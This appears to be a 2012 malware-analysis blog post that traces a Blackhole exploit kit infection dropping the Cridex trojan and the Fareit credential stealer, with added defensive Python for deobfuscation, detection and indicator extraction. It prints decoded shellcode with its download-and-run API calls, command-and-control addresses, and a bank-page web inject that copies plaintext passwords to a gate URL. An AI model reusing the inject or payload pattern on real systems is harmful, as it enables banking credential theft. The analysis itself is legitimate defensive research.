Sunday, December 16, 2012

Getting More "Personal" & Deeper into a Cridex Infection Joined with the Fareit Credential Stealer

I was posting these findings scattered across Twitter, VirusTotal and KernelMode (thanks
to @Xylit0l for the invitation), so it is time to put them together.
And I'm advising you: documentation is 1,000 times more important than it looks;
it sucks, it is time consuming, yet it is a perfect strategy to fight these moronz.

It started from a spam message leading to a redirector page, which led us to the Blackhole (v2.01) landing page. Below are the sites:

//Redirector: 
h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html
BHEK Landing Page: 
h00p://eaglepointecondo.biz/detects/operation_alert_login.php
Here are the pastes of the above data: Redirector-->>[PASTEBIN], LandingPage-->>[PASTEBIN], PluginDetectBHEK2-->>[PASTEBIN]
The landing page has a 302 "protector" for bad parameters (a request with the wrong parameters is bounced to citibank.com):
HTTP request sent, awaiting response... 302 Found
Location: h00p://citibank.com [following]
--20:24:05--  h00p://citibank.com/
           => `index.html'
Resolving citibank.com... 192.193.103.222, 192.193.219.58
Connecting to citibank.com|192.193.103.222|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: h00ps://online.citibank.com/US/Welcome.c [following]
h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.
I went straight to whacking the shellcode, by recoding it into:
// the landing page's own "var a" string: %u-escaped shellcode with "%!" in place of "%u", stored reversed
var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz -
code here friends)..%1414!%".split("").reverse().join("");
// put the "%u" back; x is now the %uXXXX-escaped shellcode, and unescape(x) turns it into the raw bytes below
x = a["replace"](/\%!/g, "%" + "u")
document.write(x);
This will burp out the shellcode; the result in binary is below:
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 fe fd 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
    :                          :                       :
4d 4b 5c 5b 07 47 58 4d  5a 49 5c 41 47 46 77 49  MK\[.GXMZI\AGFwI
44 4d 5a 5c 77 44 47 4f  41 46 06 58 40 58 17 47  DMZ\wDGOAF.X@X.G
4e 15 1b 18 12 19 46 12  19 41 12 19 41 12 1b 1b  N.....F..A..A...
0e 51 4d 15 19 45 12 19  4f 12 19 4e 12 19 42 12  .QM..E..O..N..B.
19 45 12 19 43 12 1b 18  12 19 43 12 1b 1b 12 19  .E..C.....C.....
47 0e 4f 15 19 43 0e 40  50 15 44 0e 46 4c 15 58  G.O..C.@P.D.FL.X
28 28                                             ((
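As an added example (my own code, not the page's JavaScript and nothing taken from the exploit kit), here is the same deobfuscation done offline in Python, so you never have to run the attacker's script in a browser: it reverses the string, restores the "%u" escapes, decodes them little-endian into bytes and prints them in the same 8+8 column layout as the dump above. The SAMPLE string is constructed from the first 16 bytes of that dump, encoded the way the landing page encodes them; paste the real "var a" payload in its place to decode the whole thing.

```python
import re
import struct

# Constructed sample (not taken from the page's JS): the first 16 bytes of the
# shellcode dumped above (41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81), stored
# the way the landing page stores them: %u-escaped, "%u" replaced by "%!", and the
# whole string reversed. Paste the real "var a" payload here to decode the full thing.
SAMPLE = "6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"

# One token of a JavaScript escape()-style string: %uXXXX, %XX, or a literal char.
_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.DOTALL)


def unreverse(blob: str) -> str:
    """Undo the landing page's wrapper: reverse the string, then turn "%!" back into "%u".

    This is what the page's split("").reverse().join("") and replace(/%!/g, "%u")
    do, without executing the attacker's script.
    """
    return blob[::-1].replace("%!", "%u")


def js_unescape(encoded: str) -> bytes:
    """Decode a JavaScript unescape()-style string into raw bytes.

    %uXXXX is a 16-bit code unit; heap-spray shellcode relies on it landing in
    memory little-endian, so %u8366 becomes the bytes 66 83.
    """
    out = bytearray()
    for m in _TOKEN.finditer(encoded):
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        elif m.group(2):
            out.append(int(m.group(2), 16))
        else:
            out.append(ord(m.group(3)) & 0xFF)
    return bytes(out)


def deobfuscate(blob: str) -> bytes:
    """Full pipeline: wrapper removal, then %u decoding."""
    return js_unescape(unreverse(blob))


def hexdump(data: bytes) -> str:
    """Render bytes in the same 8+8 column layout as the dump above."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        left = " ".join(f"{b:02x}" for b in chunk[:8])
        right = " ".join(f"{b:02x}" for b in chunk[8:])
        hexpart = f"{left}  {right}".ljust(48)
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{hexpart}  {text}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(hexdump(deobfuscate(SAMPLE)))
```

The first line printed for the sample is byte-for-byte the first line of the dump above, which is the check you want before feeding the output to a shellcode emulator.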
Use your shellcode cracking tools or emulator libraries to disassemble it and pull out the API calls:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
This gives us the payload download URL:
h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p
I like to see what the BHEK server side replied during the download:
// my request headers:
GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1
Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php
User-Agent: MalwareMustDie painted logo in your EK doors
Accept: */*
Host: eaglepointecondo.biz
Connection: Keep-Alive
// the reply:
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Dec 2012 11:01:05 GMT
Content-Type: application/x-msdownload
Content-Length: 135168
Connection: close
X-Powered-By: PHP/5.3.14
Pragma: public
Expires: Sat, 15 Dec 2012 11:01:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Here's what the mess looks like. I was tired, so I tried checking it in some online tools and got no satisfactory result, and VirusTotal seemed to be having problems with the upload... so I used my last energy to check it myself, as per the video.
This time I'll leave the binary analysis to you; you can use my previous post as guidance. PS: the binaries are all encrypted, so decrypting them first is a good idea! (I will add the binary analysis later on.)
I go straight to the behavior test below, to capture & expose this infection. The Cridex trojan, when executed, behaves like this. The program copies/drops itself to:
%AppData%\KB00777165.exe // which is actually the same file; the number in the name differs between the runs recorded here (KB00085031.exe in the API trace below, KB00777165.exe in the Run key)
With the copy API below:
CopyFileW(lpExistingFileName: "C:\TEST\info.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
bFailIfExists: 0x0)
Here's the proof, a self-execution trace with the following API call (command line):
lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0
It runs like this, and there are interesting strings in that binary. At this point we captured the large binary blob that came back after an HTTP POST was sent:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
DP.....O@xt,U..V|............c1..4~:
R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
.....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
.......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
u..2.~@

// The reply: chunked (the "f3b" line is the first chunk's size in hex), a long blob of encrypted binary data...
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
   :
   :snip
   :
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
And then the file below was found created in %Temp%:
FileName: exp2.tmp.exe
TimeStamp: 2012/12/15 18:58 122,880  
MD5 ce7474646297ed818bb8ed48f50c7e1e
The file looks like this. And THEN... the new exp2.tmp.exe process started. Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. So far only one registry key was added, an autostart entry for the KB*.exe copy:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003
\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: 
""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""

Network activity

At this point exp2.tmp.exe was making a hell of a lot of connections. I recorded them in Wireshark, summarized below (the numbers in parentheses are positions in the capture); the full data is here --->>[PASTEBIN]
(323): try to connect to 132.248.49.112
(335): DNS requests (reverse lookups) to...
          112.49.248.132.in-addr.arpa web.ecologia.unam.mx
          77.65.130.113.in-addr.arpa  ns.shinbiro.com..domain
(360): Communicating via HTTP/POST to 203.113.98.131:80
(385): ***** At this point the malware process exp2.tmp.exe was started....
(394): try to establish conn to 74.207.237.170
(399): send ping to 209.190.61.50
(405): Communicating via HTTP/POST to 174.143.174.136:8080
(461): try to establish conn to 199.71.215.194 
(467): Communicating via HTTP/POST to 210.56.23.100:8080
(495): try to establish conn to 132.248.49.112
(500): try to establish conn to 74.117.61.66
(535): try to establish conn to 173.192.229.36
(541): Communicating via HTTP/POST to 69.64.89.82:8080
(571): try to establish conn to: 173.224.221.135
(577): try to establish conn to: 59.90.221.6
(583): try to establish to 180.235.150.72
(588): Communicating via HTTP/POST to 123.49.61.59:8080
(641): Communicating via HTTP/POST to 123.49.61.59:8080
(716): try to establish conn to 113.130.65.77
(721): try to establish conn to  180.235.150.72
(726): Communicating via HTTP/POST to 69.64.89.82:8080
Mr. EP_X0FF, global moderator of KernelMode, cracked the code to find the full list of possible C2 connections, as below:
hxxp://123.49.61.59:8080
hxxp://180.235.150.72:8080
hxxp://59.90.221.6:8080
hxxp://173.224.221.135:8080
hxxp://210.56.23.100:8080
hxxp://199.71.215.194:8080
hxxp://74.117.61.66:8080
hxxp://209.51.221.247:8080
hxxp://174.143.174.136:8080
hxxp://74.207.237.170:8080
hxxp://203.217.147.52:8080
hxxp://208.87.243.18:8080
hxxp://206.176.226.157:8080
With the below list of callbacks:
hxxp://132.248.49.112:8080/asp/intro.php         
hxxp://113.130.65.77:8080/asp/intro.php         
hxxp://203.113.98.131:8080/asp/intro.php         
hxxp://110.164.58.250:8080/asp/intro.php         
hxxp://200.108.18.158:8080/asp/intro.php         
hxxp://207.182.144.115:8080/asp/intro.php         
hxxp://148.208.216.70:8080/asp/intro.php         
hxxp://203.172.252.26:8080/asp/intro.php         
hxxp://202.6.120.103:8080/asp/intro.php         
hxxp://203.146.208.180:8080/asp/intro.php         
hxxp://207.126.57.208:8080/asp/intro.php         
hxxp://203.80.16.81:8080/asp/intro.php         
hxxp://202.180.221.186:8080/asp/intro.php

File activity

When exp2.tmp.exe first runs it makes your PC very slow, because it searches every possible path for data to steal. VirusTotal makes a good behavioral file-access list, here-->>[PASTEBIN]; snipped here (GHISLER\wcx_ftp.ini is Total Commander's stored FTP credentials, sm.dat is CuteFTP's site manager; "failed" means the file wasn't on the test box, but the probe itself is the tell):
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)
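An added example, not from the page and not from VirusTotal: a small Python triage check that runs over a file-access list in the format quoted above and flags a process that probes the stored credentials of several different products, which is what a stealer does and a legitimate FTP client never does. The Total Commander and CuteFTP paths come from the list above; the FileZilla and WinSCP entries, and the last line of the sample log, are my own additions for illustration.

```python
import re
from collections import defaultdict

# Known credential stores, keyed by the product that owns them. Total Commander
# (GHISLER\wcx_ftp.ini) and CuteFTP (GlobalSCAPE\CuteFTP*\sm.dat) are the two
# products visible in the access list above; FileZilla and WinSCP are assumed
# additions for illustration. Extend this from the 491-entry list on the pastebin.
CREDENTIAL_STORES = {
    "Total Commander": [r"\\wcx_ftp\.ini$"],
    "CuteFTP": [r"\\GlobalSCAPE\\CuteFTP[^\\]*\\sm\.dat$"],
    "FileZilla": [r"\\FileZilla\\(sitemanager|recentservers)\.xml$"],  # assumed
    "WinSCP": [r"\\WinSCP\.ini$"],                                      # assumed
}

# Constructed sample in the page's "<path> (successful|failed)" format: the lines
# quoted above, plus one FileZilla line added to show the threshold tripping.
SAMPLE_ACCESS_LOG = r"""
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml (failed)
"""

LINE_RE = re.compile(r"^(?P<path>.+?) \((?P<result>successful|failed)\)$")


def parse_access_log(text):
    """Yield (path, result) for each well-formed line; ignore anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("path"), m.group("result")


def products_probed(text):
    """Map product -> [(path, result)] for every credential-store path touched.

    Failed opens count: the stealer asks for every store whether or not it exists,
    and on a real victim the ones that exist are the ones that get read.
    """
    hits = defaultdict(list)
    for path, result in parse_access_log(text):
        for product, patterns in CREDENTIAL_STORES.items():
            if any(re.search(p, path, re.IGNORECASE) for p in patterns):
                hits[product].append((path, result))
    return dict(hits)


def looks_like_stealer(text, min_products=3):
    """Flag when one process reaches into the stores of several unrelated products.

    Threshold on distinct products, not on path count: a real FTP client opens its
    own config many times, but never another vendor's.
    """
    hits = products_probed(text)
    return len(hits) >= min_products, hits


if __name__ == "__main__":
    flagged, hits = looks_like_stealer(SAMPLE_ACCESS_LOG)
    print("stealer-like:", flagged)
    for product, entries in hits.items():
        print(f"  {product}: {len(entries)} store path(s) probed")
```

With only the lines quoted on the page (two products) the check stays quiet; the added FileZilla probe is the third product and trips it. Tune min_products to your environment, and remember the file list from a sandbox only shows the stores the sample looked for, not the ones it found.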

The Password Stealer Configurator

At this point, in your registry at the key below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\:
a long string like this was saved:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 63 68 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66   
   :
6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D 52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42 26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
Save that↑ as binary with a .txt filename & you'll see this malware config in text: the bank / online sites being targeted, with the credential path for each, plus some public HTTPS or FTP sites. I saved the data here-->>[PASTEBIN]. Thanks again to Mr. EP_X0FF, global moderator of KernelMode, who listed all of the software & credential paths being sought, here-->>[PASTEBIN]. I counted 491 types of credentials being sought. Back to this stealer configuration: it carries web injects like the one below, which hooks the bank page's own EncryptPassword() function so that the plaintext password is copied into a hidden field before the page encrypts it for the POST:
// web inject from the config: wrap the bank page's own EncryptPassword()
if (typeof window.EncryptPassword == 'function') {
  var fn = window.EncryptPassword;
  window.EncryptPassword = function (id) {
    try {
      var e = document.getElementById(id);   // the password field
      var i = document.createElement("input");
      i.type = "hidden";
      i.name = "OPN";
      i.value = e.value;                      // plaintext copy
      document.Form1.appendChild(i);          // rides along in the bank's POST
    } catch (e) {}
    return fn(id);                            // then let the real encryption run
  };
}
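An added example, not from the page: the two fragments of the registry blob above (the page snips the middle) decoded in Python and mined for the indicators a responder wants, the config hash, the URL deny/target patterns, and the gate URL with its botid and bank parameters from the injected <script>. It uses regexes instead of an XML parser because the dump is truncated and a real one may be too; nothing beyond the bytes quoted above is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The head and tail of the registry value quoted above, copied verbatim as hex.
# The page snips the middle, so they are kept as two separate fragments.
CONFIG_HEAD_HEX = """
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22
39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38
22 3E 3C 68 74 74 70 73 68 6F 74 73 3E
3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E
5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E
3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E
5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E
3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E
2F 61 63 68 2F 3C 2F 75 72 6C 3E
3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E
2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66
"""
CONFIG_TAIL_HEX = """
6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E
3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B
3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22
68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D
52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42
26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E
3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E
3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
"""


def decode_fragment(hexdump: str) -> str:
    """bytes.fromhex() skips whitespace, so a registry dump can be pasted in as-is."""
    return bytes.fromhex(hexdump).decode("latin-1")


SETTINGS_HASH = re.compile(r'<settings hash="([0-9a-fA-F]+)"')
URL_RULE = re.compile(r"<url\b([^>]*)>([^<]*)</url>")
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc="([^"]+)"')


def extract_iocs(config_text: str) -> dict:
    """Pull the hunt-worthy bits out of decoded config text.

    Regexes rather than an XML parser: the blob is truncated on the page, a real
    dump may be too, and we want whatever IOCs survive.
    """
    m = SETTINGS_HASH.search(config_text)
    deny, targets = [], []
    for attrs, pattern in URL_RULE.findall(config_text):
        (deny if 'type="deny"' in attrs else targets).append(pattern)
    injects = []
    for src in SCRIPT_SRC.findall(config_text):
        parts = urlsplit(src)
        q = parse_qs(parts.query)
        injects.append({
            "gate": f"{parts.scheme}://{parts.netloc}{parts.path}",
            "botid": q.get("botid", [""])[0],
            "bank": q.get("bank", [""])[0],
        })
    return {"hash": m.group(1) if m else None, "deny": deny,
            "targets": targets, "injects": injects}


def analyse(*hex_fragments: str) -> dict:
    """Decode each fragment on its own and join them with a visible gap, so no
    pattern is matched across the snip."""
    text = "\n[...snip...]\n".join(decode_fragment(f) for f in hex_fragments)
    return extract_iocs(text)


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(CONFIG_HEAD_HEX, CONFIG_TAIL_HEX), indent=2))
```

The truncated "/authentication/zbf" rule at the end of the head fragment has no closing tag, so it is deliberately not reported; the gate host and port it does report (78.159.121.128:8080) are the same ones the PoC below sends the stolen credentials to, which is the cross-check that the decode is right.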
There is also a phishing trap for credit card / online banking details; the code is in the stealer configuration, something like this snippet:
      :
<span class="bodytext">
 Click "Next" to complete Identity verification process. 
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
        </tr>
        <tr>
          <td>
             </td>
          <td>
            <span class="bodytext">
              <label title="Go to Enter Card">
                
              </label>
            </span>
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
              :
I just saved the configuration data as HTML & ran it as a PoC, saved as teststealer.html (mind the path & filename). Then here we go... Hello American Express! Good day Chase Bank! As confirmed in the configuration code, it sends the stolen credentials to:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamerica

Virus Total Detection Ratio

It's been more than 24 hours since I detected these messes; after the first disclosure here and there, let's see the detection ratio of these infectors below.
The landing page:
SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656
MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f
File size: 90.1 KB (92310 bytes)
File name: operation_alert_login.php
File type: HTML
Detection ratio: 6 / 46
Analysis date: 2012-12-16 06:22:39 UTC (1 minute ago)
URL -->>[CLICK]
Malware names:
  McAfee-GW-Edition: JS/Exploit-Blacole.gq
  NANO-Antivirus: Trojan.Script.Expack.bcrxpa
  McAfee: JS/Exploit-Blacole.gq
  Fortinet: JS/Obfuscus.AACB!tr
  TheHacker: JS/Feebs.gen@MM
  AVG: JS/Redir
The Cridex trojan of password stealer downloader:
SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba
MD5: b360fec7652688dc9215fd366530d40c
File size: 132.0 KB (135168 bytes)
File name: info.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 26 / 45
Analysis date: 2012-12-16 01:28:28 UTC (5 hours, 5 minutes ago)
URL -->>[CLICK]
Malware names:
  MicroWorld-eScan: Trojan.Generic.KD.810285
  McAfee: pws-ja!cm
  Malwarebytes: Trojan.FakeMS
  Symantec: W32.Cridex
  Norman: W32/Suspicious_Gen4.BTZMQ
  ESET-NOD32: a variant of Win32/Kryptik.AQNJ
  TrendMicro-HouseCall: TROJ_GEN.RCBCDLE
  Avast: Win32:Dropper-MEA [Drp]
  Kaspersky: Trojan.Win32.Bublik.wad
  BitDefender: Trojan.Generic.KD.810285
  Emsisoft: Trojan.Win32.Agent.AMN (A)
  Comodo: TrojWare.Win32.Trojan.Agent.Gen
  F-Secure: Trojan.Generic.KD.810285
  DrWeb: Trojan.Necurs.97
  VIPRE: Win32.Malware!Drop
  AntiVir: TR/Bublik.wad
  McAfee-GW-Edition: pws-ja!cm
  Sophos: Troj/Agent-ZIT
  Microsoft: Worm:Win32/Cridex.E
  ViRobot: Trojan.Win32.A.Bublik.135168.S
  GData: Trojan.Generic.KD.810285
  PCTools: Malware.Cridex
  Ikarus: Trojan-Spy.Agent
  Fortinet: W32/Bublik.WAD!tr
  AVG: Generic30.BIMO
  Panda: Trj/Sinowal.WWG
The password stealer (fareit) trojan:
SHA1: 88bab6d7c0e98b1ee55110243251f562af399854
MD5: ce7474646297ed818bb8ed48f50c7e1e
File size: 120.0 KB (122880 bytes)
File name: exp2.tmp.ex_
File type: Win32 EXE
Tags: peexe
Detection ratio: 7 / 46
Analysis date: 2012-12-16 01:13:52 UTC (5 hours, 6 minutes ago)
URL -->>[CLICK]
Malware names:
  DrWeb: Trojan.PWS.Stealer.1656
  VIPRE: Trojan.Win32.Kryptik.alry (v)
  Emsisoft: Trojan.PSW.Win32.Tepfer.dazd.AMN (A)
  Kaspersky: Trojan-PSW.Win32.Tepfer.dazd
  Malwarebytes: Trojan.PWS
  Kingsoft: Win32.Malware.Generic.a.(kcloud)
  ViRobot: Trojan.Win32.A.PSW-Tepfer.122880.A
We can see that the landing page & the password stealer (Fareit) still have low detection.

Samples

For the good guys, the samples & captured data are available. Samples --->>[HERE] Research Data (PCAP, RegShot) -->>[HERE] Cracked Data (deobfuscated code, decrypted binaries (thanks to KernelMode!), etc.) -->>[HERE]

Thanks to...

